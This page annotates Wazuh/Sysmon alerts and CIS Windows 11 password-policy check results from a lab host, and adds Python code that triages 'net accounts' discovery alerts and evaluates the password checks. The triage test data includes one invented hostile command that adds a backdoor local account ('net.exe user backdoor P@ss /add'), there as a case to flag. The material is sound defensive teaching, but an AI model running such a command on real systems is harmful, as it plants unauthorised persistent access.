data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe The net1.exe helper that net.exe delegates to; the SysWOW64 path comes from WOW64 file-system redirection of the system32 path in the command line.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) Version string from the PE resource.
data.win.eventdata.description: Net Command Description string from the PE resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE resource (metadata, not a signature check).
data.win.eventdata.originalFileName: net1.exe Internal name from the PE header; matches image.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts Exact command line; the same `net accounts` query as the parent, now executed by the helper.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Working directory inherited down the tree from the Wazuh agent.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Sysmon identifier for the logon session; identical to the parent's.
data.win.eventdata.logonId: 0x3e7 0x3e7 (999) is the well-known SYSTEM logon session.
data.win.eventdata.terminalSessionId: 0 Session 0: the non-interactive services session.
data.win.eventdata.integrityLevel: System Mandatory integrity level of the process.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 Hash of net1.exe; identical to the net1.exe event at the top of this excerpt, as expected for the same file.
data.win.eventdata.parentProcessGuid: {94294ddc-be35-680a-030c-000000000e00} Sysmon GUID of the parent: the processGuid of the net.exe event directly above, which in turn was spawned by wazuh-agent.exe. That closes the chain agent -> net.exe -> net1.exe.
data.win.eventdata.parentProcessId: 10832 PID of the parent net.exe.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe Parent executable.
data.win.eventdata.parentCommandLine: net.exe accounts Parent's command line.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2183679 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event (Sysmon, not the Security log).
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider; identical on every host.
data.win.system.eventID: 1 Sysmon Event ID 1 = Process Create (the Sysmon counterpart of Security 4688).
data.win.system.version: 5 Schema version of this event type.
data.win.system.level: 4 Numeric level; 4 = Informational.
data.win.system.task: 1 Task number; for Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode (0 = Info). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords; the same on all Sysmon events.
data.win.system.systemTime: 2025-04-24T22:41:57.4317579Z Time the event was written to the log (UTC); eventdata.utcTime is the creation time.
data.win.system.eventRecordID: 288458 Incremental log record number – handy for timeline order; a second net.exe from the agent within 200 ms of the first (288452), i.e. another SCA check that runs the same command.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the process being created.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the event.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the Wazuh agent subscribes to.
data.win.system.computer: Attacker Hostname as recorded by Windows; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.425
ProcessGuid: {94294ddc-be35-680a-060c-000000000e00}
ProcessId: 4616
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" End of Sysmon's rendered message; the parsed eventdata fields below carry the same values.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.425 Process creation time (UTC) stamped by Sysmon.
data.win.eventdata.processGuid: {94294ddc-be35-680a-060c-000000000e00} Sysmon's unique process identifier; expect a following net1.exe event whose parentProcessGuid is this value.
data.win.eventdata.processId: 4616 PID of the new process; pair with processGuid.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe Executable that started: the 32‑bit copy, because the 32‑bit Wazuh agent launched it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Version string from the PE resource.
data.win.eventdata.description: Net Command Description string from the PE resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product string from the PE resource.
data.win.eventdata.company: Microsoft Corporation Company string from the PE resource (metadata, not a signature check).
data.win.eventdata.originalFileName: net.exe Internal name from the PE header; matches image.
data.win.eventdata.commandLine: net.exe accounts Exact command line, the same local policy query as the previous net.exe event: each SCA check that needs `net accounts` output launches it again.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Working directory inherited from the parent: the Wazuh agent's install directory.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Sysmon identifier for the logon session.
data.win.eventdata.logonId: 0x3e7 0x3e7 (999) is the well-known SYSTEM logon session.
data.win.eventdata.terminalSessionId: 0 Session 0: the non-interactive services session.
data.win.eventdata.integrityLevel: System Mandatory integrity level of the process.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 Hash of net.exe; identical to the earlier net.exe event, as expected for the same file.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} Sysmon GUID of the parent; the same agent process as before.
data.win.eventdata.parentProcessId: 3244 PID of the parent.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe The Wazuh agent spawned this net.exe too: the SCA scan working through its checks. Same caveat as before: verify the agent binary and the policy before suppressing.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" Parent's command line.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
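The Process Create alerts above all have the same shape: net.exe, or its net1.exe helper, running `net accounts` as SYSTEM from the Wazuh agent's directory, with wazuh-agent.exe at the top of the tree, which is exactly the command the SCA check below executes. The following Python is an added triage example, not Wazuh code and not part of the original page. It walks the Sysmon parent chain on processGuid/parentProcessGuid and marks an alert as the agent's own scan only when every process in the chain runs a command from an allow-list (here just `net.exe accounts`, taken from data.sca.check.command) and the chain ends at wazuh-agent.exe. The alert dicts are constructed from the page's fields, trimmed to the keys the logic reads; the two cases with zeroed GUIDs and the CORP\jdoe user are invented; SCA_COMMANDS and the install-path regex are assumptions to adapt to your own policy and deployment.

```python
"""Triage the Sysmon Event ID 1 'Discovery activity executed' alerts (rule 92031).

Added example, not code from Wazuh or from the original page. Alert dicts are
constructed from the page's own fields plus two invented cases marked as such.
"""
import re

# Commands the page's CIS Windows 11 SCA policy is seen to run (data.sca.check.command).
# Assumption: extend this from your own SCA policy file; Wazuh publishes no such list.
SCA_COMMANDS = {"net.exe accounts"}

# Assumed default install path of the Wazuh agent.
WAZUH_AGENT = re.compile(r"\\ossec-agent\\wazuh-agent\.exe$", re.IGNORECASE)


def norm_cmd(cmd: str) -> str:
    """Reduce a CommandLine to '<exe> <args>' so that
    'C:\\WINDOWS\\system32\\net1 accounts' and 'net.exe accounts' compare equal."""
    parts = cmd.strip().split()
    if not parts:
        return ""
    exe = parts[0].strip('"').rsplit("\\", 1)[-1].lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    if exe == "net1":            # net.exe delegates to net1.exe; treat both as 'net'
        exe = "net"
    return " ".join([exe + ".exe", *[p.lower() for p in parts[1:]]])


def ev(alert):
    return alert["data"]["win"]["eventdata"]


def classify(alert, alerts, max_depth=8):
    """'sca-scan' if this process and every ancestor up to wazuh-agent.exe run an
    SCA command; 'investigate' otherwise (unknown command, wrong parent, or a
    lineage that cannot be proven because the parent's EID 1 is not in the window)."""
    by_guid = {ev(a)["processGuid"]: ev(a) for a in alerts}
    cur = ev(alert)
    for _ in range(max_depth):
        if norm_cmd(cur["commandLine"]) not in SCA_COMMANDS:
            return "investigate"
        if WAZUH_AGENT.search(cur["parentImage"]):
            return "sca-scan"
        cur = by_guid.get(cur["parentProcessGuid"])
        if cur is None:
            return "investigate"
    return "investigate"


def mk(guid, image, cmd, user, pguid, pimage):
    """Build a minimal Wazuh-shaped alert dict (only the keys classify() reads)."""
    return {"rule": {"id": 92031}, "data": {"win": {"eventdata": {
        "processGuid": guid, "image": image, "commandLine": cmd, "user": user,
        "parentProcessGuid": pguid, "parentImage": pimage}}}}


AGENT = r"C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
NET = r"C:\Windows\SysWOW64\net.exe"
NET1 = r"C:\Windows\SysWOW64\net1.exe"
SYSTEM = r"NT AUTHORITY\SYSTEM"

ALERTS = [
    # from the page: net.exe 10832, parent wazuh-agent.exe 3244
    mk("{94294ddc-be35-680a-030c-000000000e00}", NET, "net.exe accounts", SYSTEM,
       "{94294ddc-ea88-67fe-4900-000000000e00}", AGENT),
    # from the page: net1.exe 11376, parent net.exe 10832
    mk("{94294ddc-be35-680a-050c-000000000e00}", NET1, r"C:\WINDOWS\system32\net1 accounts",
       SYSTEM, "{94294ddc-be35-680a-030c-000000000e00}", NET),
    # from the page: net1.exe 17256, whose parent (pid 9628) is not in this window
    mk("{94294ddc-be35-680a-020c-000000000e00}", NET1, r"C:\WINDOWS\system32\net1 accounts",
       SYSTEM, "{94294ddc-be34-680a-ff0b-000000000e00}", NET),
    # invented: same command, but launched from an interactive shell by a user
    mk("{00000000-0000-0000-0000-000000000001}", NET, "net.exe accounts", r"CORP\jdoe",
       "{00000000-0000-0000-0000-000000000002}",
       r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    # invented: right parent, but not a command any SCA check runs
    mk("{00000000-0000-0000-0000-000000000003}", NET, "net.exe user backdoor P@ss /add",
       SYSTEM, "{94294ddc-ea88-67fe-4900-000000000e00}", AGENT),
]


def triage(alerts=ALERTS):
    """Map processGuid -> verdict for every alert in the window."""
    return {ev(a)["processGuid"]: classify(a, alerts) for a in alerts}


if __name__ == "__main__":
    for guid, verdict in triage().items():
        print(f"{verdict:12} {guid}")
```

The two page events rooted at the agent come back sca-scan, and so does the net1.exe event whose parent net.exe is in the window. The first net1.exe event comes back investigate only because its parent's Event ID 1 is outside this excerpt, which is the right default: without the parent event you cannot prove lineage. In production the same two conditions belong in a level-0 child rule of 92031 rather than in a script, but keep both conditions; suppressing on the parent image alone would also hide a `net user ... /add` launched from a compromised agent.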
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19015 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] CIS Critical Security Controls mapping, lifted from data.sca.check.compliance.cis_csc; the Controls version (v7 or v8) depends on the benchmark release, so check the policy file before quoting it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2188912 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Event type: 'check' carries one check's result, 'summary' carries the per-scan totals.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run. Both SCA alerts on this page share it, so they come from the single scan that spawned the net.exe processes above.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26001 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting defines how long a user can use their password before it expires. Values for this policy setting range from 0 to 999 days. If you set the value to 0, the password will never expire. Because attackers can crack passwords, the more frequently you change the password the less opportunity an attacker has to use a cracked password. However, the lower this value is set, the higher the potential for an increase in calls to help desk support due to users having to change their password or forgetting which password is current. The recommended state for this setting is 365 or fewer days, but not 0. Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The longer a password exists the higher the likelihood that it will be compromised by a brute force attack, by an attacker gaining general knowledge about the user, or by the user sharing the password. Configuring the Maximum password age setting to 0 so that users are never required to change their passwords is a major security risk because that allows a compromised password to be used by the malicious user for as long as the valid user has authorized access. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 365 or fewer days, but not 0: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Maximum password age Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.2 Benchmark section this check implements; the same value is lifted into rule.cis.
data.sca.check.compliance.cis_csc: 5.2 CIS Critical Security Controls mapping, lifted into rule.cis_csc; the Controls version depends on the benchmark release.
data.sca.check.command: ['net.exe accounts'] Command the agent ran to evaluate the check. This is the process behind the Sysmon Event ID 1 / rule 92031 alerts above: the agent executes it as SYSTEM on every scan, and each run yields one net.exe plus one net1.exe event. Reproduce it yourself when verifying.
data.sca.check.result: passed passed or failed. failed = needs fixing.
data.sca.check.previous_result: not applicable Last run's result. 'not applicable' means the earlier scan could not evaluate the check at all, so this change is first-time coverage rather than configuration drift; a passed-to-failed change is drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
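The check above is decided from the same `net accounts` output that the Sysmon alerts were chasing. As an added example, not Wazuh's SCA engine and not code from the page, here is that evaluation in Python for this check (CIS 1.1.2) and for the 'Minimum password length' check (CIS 1.1.4) that the next alert reports as failed; it also handles the edge case the title calls out, a maximum age of 0, which `net accounts` prints as 'Unlimited'. The page shows only the results, not the real command output, so sample_output constructs an English-locale Windows 11 table with the stock defaults (42-day maximum age, no minimum length); the function and its row layout are assumptions.

```python
"""Evaluate CIS Windows 11 checks 1.1.2 and 1.1.4 from `net accounts` output.

Added example, not Wazuh's SCA engine and not code from the original page.
The sample output is constructed; the page does not show the real table.
"""

# cis_id -> (label printed by `net accounts`, predicate on the parsed value).
# None means the setting is disabled/unlimited, which fails both checks:
# a maximum age of 0 ("never expires") is exactly what 1.1.2 forbids.
CHECKS = {
    "1.1.2": ("Maximum password age (days)", lambda v: v is not None and 0 < v <= 365),
    "1.1.4": ("Minimum password length", lambda v: v is not None and v >= 14),
}

DISABLED_WORDS = {"unlimited", "never", "none"}


def parse_net_accounts(text):
    """Turn the two-column `net accounts` table into {label: int | None | str}."""
    settings = {}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        if not sep:
            continue                      # 'The command completed successfully.' etc.
        label, value = label.strip(), value.strip()
        if value.isdigit():
            settings[label] = int(value)
        elif value.lower() in DISABLED_WORDS:
            settings[label] = None        # unlimited age / no lockout / no history
        else:
            settings[label] = value       # e.g. 'Computer role: WORKSTATION'
    return settings


def evaluate(text):
    """Return {cis_id: 'passed' | 'failed' | 'not applicable'}, like an SCA check."""
    settings = parse_net_accounts(text)
    results = {}
    for cis_id, (label, ok) in CHECKS.items():
        if label not in settings:
            results[cis_id] = "not applicable"   # could not be evaluated (cf. previous_result)
        else:
            results[cis_id] = "passed" if ok(settings[label]) else "failed"
    return results


def sample_output(max_age="42", min_len="0"):
    """Constructed English-locale `net accounts` output; defaults are Windows 11's."""
    rows = [
        ("Force user logoff how long after time expires?", "Never"),
        ("Minimum password age (days)", "0"),
        ("Maximum password age (days)", max_age),
        ("Minimum password length", min_len),
        ("Length of password history maintained", "None"),
        ("Lockout threshold", "Never"),
        ("Lockout duration (minutes)", "30"),
        ("Lockout observation window (minutes)", "30"),
        ("Computer role", "WORKSTATION"),
    ]
    table = "\n".join(f"{k + ':':<54}{v}" for k, v in rows)
    return table + "\nThe command completed successfully.\n"


if __name__ == "__main__":
    print(evaluate(sample_output()))                   # page: 1.1.2 passed, 1.1.4 failed
    print(evaluate(sample_output("Unlimited", "14")))  # never expires: 1.1.2 failed
```

With the defaults the result matches the page (1.1.2 passed, 1.1.4 failed). Setting the maximum age to Unlimited flips 1.1.2 to failed even though "no expiry" might look like a pass to a naive numeric comparison, and a table with no recognisable rows yields 'not applicable', which is the state the previous_result field above recorded.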
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] Maps to the CIS Critical Security Controls (CIS Controls) safeguard – the framework‑level sibling of rule.cis.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2194244 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26003 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Minimum password length' is set to '14 or more character(s)'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines the least number of characters that make up a password for a user account. There are many different theories about how to determine the best password length for an organization, but perhaps 'passphrase' is a better term than 'password.' In Microsoft Windows 2000 and newer, passphrases can be quite long and can include spaces. Therefore, a phrase such as 'I want to drink a $5 milkshake' is a valid passphrase; it is a considerably stronger password than an 8 or 10 character string of random numbers and letters, and yet is easier to remember. Users must be educated about the proper selection and maintenance of passwords, especially with regard to password length. In enterprise environments, the ideal value for the Minimum password length setting is 14 characters, however you should adjust this value to meet your organization's business requirements. The recommended state for this setting is: 14 or more character(s). Note: In Windows Server 2016 and older versions of Windows Server, the GUI of the Local Security Policy (LSP), Local Group Policy Editor (LGPE) and Group Policy Management Editor (GPME) would not let you set this value higher than 14 characters. However, starting with Windows Server 2019, Microsoft changed the GUI to allow up to a 20 character minimum password length. Note #2: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Types of password attacks include dictionary attacks (which attempt to use common words and phrases) and brute force attacks (which try every possible combination of characters). Also, attackers sometimes try to obtain the account database so they can use tools to discover the accounts and passwords. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 14 or more character(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Minimum password length Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.4 CIS benchmark section number of this check – here 1.1.4, Minimum password length. Use it to find the control in the benchmark PDF.
data.sca.check.compliance.cis_csc: 5.2 CIS Critical Security Controls (CIS Controls) safeguard this check maps to – the framework‑level sibling of the benchmark section.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534520.2200582 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, so eventID 1 below is Sysmon's Process Create, not a Security‑log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider – fixed for Sysmon, useful only as a filter.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 Schema version of the event record; bumps when Sysmon changes the field layout.
data.win.system.level: 4 Numeric severity; 4 = Informational, matching severityValue below.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.7743593Z UTC time the record was written to the event log (ISO 8601, trailing Z).
data.win.system.eventRecordID: 288469 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that logged the event – the Sysmon service itself, not the process being created.
data.win.system.threadID: 4740 Thread in that logging process; rarely needed.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in – open it in Event Viewer to see the raw event.
data.win.system.computer: Attacker Hostname stamped on the Windows event; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.769
ProcessGuid: {94294ddc-be35-680a-080c-000000000e00}
ProcessId: 10112
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be35-680a-060c-000000000e00}
ParentProcessId: 4616
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" Full Sysmon event text as rendered; the data.win.eventdata.* fields below are the parsed version of the same lines.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.769 Sysmon's own UTC timestamp of the process creation; slightly earlier than systemTime, which is when the record was written.
data.win.eventdata.processGuid: {94294ddc-be35-680a-080c-000000000e00} Sysmon's globally unique ID for the new process – survives PID reuse, so use it (not processId) to chain parent/child events.
data.win.eventdata.processId: 10112 PID of the new process; PIDs are reused after exit, hence the GUID.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe Full path of the executable that started; backslashes are JSON‑escaped.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) Version string from the binary's PE version resource.
data.win.eventdata.description: Net Command Description from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company name from the PE version resource.
data.win.eventdata.originalFileName: net1.exe Internal name compiled into the binary – unchanged when the file on disk is renamed, so compare it with image to catch renamed copies.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts Exact command line the process was started with; the single most useful field for judging discovery or LOLBin activity.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Working directory of the new process; here the Wazuh agent folder, consistent with an agent‑spawned SCA check.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the new process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Unique ID of the logon session the process belongs to; group activity from one logon with it.
data.win.eventdata.logonId: 0x3e7 Logon session ID; 0x3e7 is the well‑known SYSTEM session.
data.win.eventdata.terminalSessionId: 0 Windows session number; 0 is the services session, so no interactive desktop.
data.win.eventdata.integrityLevel: System Mandatory integrity level (Low, Medium, High, System) of the new process.
